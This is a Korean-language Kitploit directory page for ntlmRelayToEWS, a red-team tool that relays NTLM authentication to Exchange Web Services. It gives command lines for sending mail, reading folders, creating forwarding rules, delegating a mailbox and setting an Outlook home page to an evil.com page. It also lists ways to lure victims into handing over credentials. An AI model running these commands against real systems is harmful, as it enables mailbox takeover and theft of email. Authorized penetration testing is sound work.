Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
NtlmRelayToEWS — Exchange Web Services를 대상으로 한 ntlm 릴레이 공격 | Kitploit
도구/GitHubGitHub/arno0x/ntlmrelaytoews
Phishing ToolsExploitationInformation GatheringWeb SecurityPenetration TestingRed TeamingEmail Security
GitHubarno0x/ntlmrelaytoews

NtlmRelayToEWS

Exchange Web Services를 대상으로 한 ntlm 릴레이 공격

저장소 보기
33258508년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

ntlmRelayToEWS

저자: Arno0x0x - @Arno0x0x

ntlmRelayToEWS는 Exchange Web Services(EWS)에 대한 NTLM 릴레이 공격을 수행하기 위한 도구입니다. 445번 포트에서 SMBListener와 80번 포트에서 HTTPListener를 생성하여 피해자로부터의 수신 연결을 기다립니다. 피해자가 리스너 중 하나에 연결하면 NTLM 협상이 발생하고 대상 EWS 서버로 릴레이됩니다.

분명히 이 도구는 전체 EWS API를 구현하지 않으므로 일부 공격 시나리오에서 유용할 수 있는 소수의 서비스만 구현되어 있습니다. 추후에 더 추가할 수도 있습니다. 어떤 EWS 호출이 구현되어 있는지 알아보려면 'usage' 섹션을 참조하십시오.

제한 사항 및 개선 사항

Exchange 버전:
이 도구를 Exchange Server 2010 SP2에서만 테스트했습니다(확실히 꽤 오래된 버전입니다). 따라서 모든 EWS SOAP 요청 템플릿과 EWS 응답 구문 분석은 이 Exchange 버전에 대해서만 테스트되었습니다. 직접 테스트해보지는 않았지만, 일부 사용자는 이 도구가 Exchange 2016 서버에서도 추가 수정 없이(즉, SOAP 요청 템플릿을 변경하지 않고) 작동한다고 보고했습니다.

만약 해당 SOAP 요청이 다른 Exchange 버전에서 작동하지 않는 경우, Microsoft EWS Managed API를 추적 모드로 사용하여 적절한 SOAP 요청을 캡처함으로써 최신 버전에 맞는 SOAP 요청 템플릿을 쉽게 만들 수 있습니다(제가 그렇게 했습니다!).

EWS SOAP 클라이언트:
Exchange WSDL을 기반으로 모든 SOAP 요청을 자동으로 생성하기 위한 적절한 인터페이스를 얻기 위해 SOAP 클라이언트를 사용하고 싶었습니다. 'zeep'를 사용해보려 했지만 Exchange WSDL과 함께 작동하도록 하는 데 어려움을 겪었습니다. 외부 네임스페이스를 다운로드해야 하므로 인터넷 연결이 필요하기 때문입니다. 또한 'zeep'에서 사용자 정의 전송 세션을 사용하려면 Requests.session이 필요한데, 이는 기본적으로 HTTPClientRelay에서 사용하는 HTTP(S) 세션 유형이 아닙니다. 따라서 HTTPClientRelay를 'Requests'를 사용하도록 리팩토링하거나(/me lazy), zeep이 zeep.client.create_message()로 메시지를 생성하고 이미 보유한 릴레이 세션을 통해 전송하도록 하는 방법이 있었을 것입니다. 아니면 제가 개발자로서 무능력한 탓일까요? 아, 뭐...

전제 조건

ntlmRelayToEWS는 Impacket의 적절하고 깨끗한 설치가 필요합니다. 따라서 해당 안내에 따라 Impacket의 작동 버전을 설치하십시오.

사용법

ntlmRelayToEWS는 다음 공격을 구현하며, 모두 릴레이된 사용자(피해자)를 대신하여 수행됩니다.

추가 정보는 도움말을 참조하십시오: ./ntlmRelayToEWS -h. --verbose 또는 -v 플래그를 사용하여 더 많은 디버그 정보를 확인할 수 있습니다.

sendMail
HTML 형식의 이메일을 수신자 목록으로 보냅니다:
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r sendMail -d "[email protected],[email protected]" -s Subject -m sampleMsg.html

getFolder
미리 정의된 폴더(받은 편지함, 보낸 편지함, 일정, 작업)에서 모든 항목을 검색합니다:
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r getFolder -f inbox

forwardRule
피해자의 모든 수신 메시지를 다른 이메일 주소로 전달하는 악성 전달 규칙을 생성합니다:
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r forwardRule -d [email protected]

setHomePage
URL을 지정하여 폴더 홈 페이지(일반적으로 받은 편지함 폴더)를 정의합니다. SensePost/Etienne Stalmans가 발견한 이 기술은 특정 HTML 페이지를 위조하여 피해자의 Outlook 프로그램에서 임의 명령 실행을 가능하게 합니다: Outlook Home Page – Another Ruler Vector:
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r setHomePage -f inbox -u http://path.to.evil.com/evilpage.html

addDelegate
피해자의 기본 사서함에 위임 주소를 설정합니다. 즉, 피해자가 자신의 사서함 제어 권한을 다른 사람에게 위임합니다. 이렇게 하면 위임된 주소가 Outlook에서 추가 사서함으로 열어 피해자의 사서함을 완전히 제어할 수 있습니다:
./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r addDelegate -d [email protected]

피해자가 릴레이를 위해 자격 증명을 제공하도록 하는 방법

피해자가 ntlmRelayToEWS에 자격 증명을 보내도록 하려면 다음 잘 알려진 방법 중 하나를 사용할 수 있습니다:

  • 'src' 속성이 ntlmRelayToEWS 서버를 가리키는(HTTP 또는 SMB 사용) 숨겨진 그림이 포함된 이메일을 피해자에게 보냅니다. 이를 위해 Invoke-SendEmail.ps1 스크립트를 확인하십시오.
  • 'icon' 속성이 UNC 경로를 사용하여 ntlmRelayToEWS를 가리키는 링크 파일을 만들고 피해자가 이 링크가 있는 폴더를 탐색하도록 합니다.
  • LLMNR, NBNS 또는 WPAD 중독(예: Responder.py 또는 Invoke-Inveigh 생각)을 수행하여 피해자의 해당 SMB 또는 HTTP 트래픽을 ntlmRelayToEWS로 보냅니다.
  • 기타?

크레딧

Impacket 및 Alberto Solino @agsolino의 ntlmrelayx를 기반으로 합니다.

면책 조항

이 도구는 합법적이고 정당한 방법으로만 사용하도록 고안되었습니다:

  • 학습, 수행 가능한 작업 및 방법 시연, 방어 및 탐지 메커니즘 테스트 목적으로 자신의 시스템에서 사용
  • 공식적이고 합법적으로 보안 평가(침투 테스트, 보안 감사)를 수행할 권한이 있는 시스템에서 사용

Empire 저자의 말을 인용하자면: 합법적인 정보 보안 업계에 유용한 공격 도구를 구축하면서 동시에 악의적인 공격자가 이를 남용하는 것을 방지할 방법은 없습니다.

도구 다운로드